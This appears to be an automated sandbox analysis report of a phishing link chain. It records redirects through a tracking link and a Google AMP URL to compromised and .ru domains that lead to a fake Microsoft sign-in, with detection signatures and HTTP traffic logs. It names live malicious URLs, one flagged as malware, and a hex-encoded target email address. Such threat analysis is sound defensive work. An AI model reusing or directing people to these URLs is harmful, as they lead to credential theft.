Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789

Overview

General Information

Sample URL:https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3
Analysis ID:1591369
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2224,i,10226237181688976301,14341506509442176442,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru/UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQAvira URL Cloud: Label: malware

Phishing

barindex
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wv.bomirax.ru/Z1cxl9eG/#M$ZGFrb3... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and redirecting the user to a suspicious domain. The script also includes a debugger trap that could be used to detect and evade analysis. These behaviors strongly suggest malicious intent, likely for the purpose of phishing or other malicious activities.
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wv.bomirax.ru/Z1cxl9eG/#M$ZGFrb3... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an untrusted domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicative of malicious intent.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wv.bomirax.ru/Z1cxl9eG/#M$ZGFrb3... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 87b57482-a530-4373-809a-38b4569f633fc21bb167-2bb4-4036-b233-69247b0af599
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://wv.bomirax.ru/Z1cxl9eG/#M$ZGFrb3HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.4:49738 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to http://avrancecorp.com/wp-web/griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$zgfrb3
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789 HTTP/1.1Host: emp.eduyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3 HTTP/1.1Host: google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3 HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /404.shtml HTTP/1.1Host: avrancecorp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://avrancecorp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
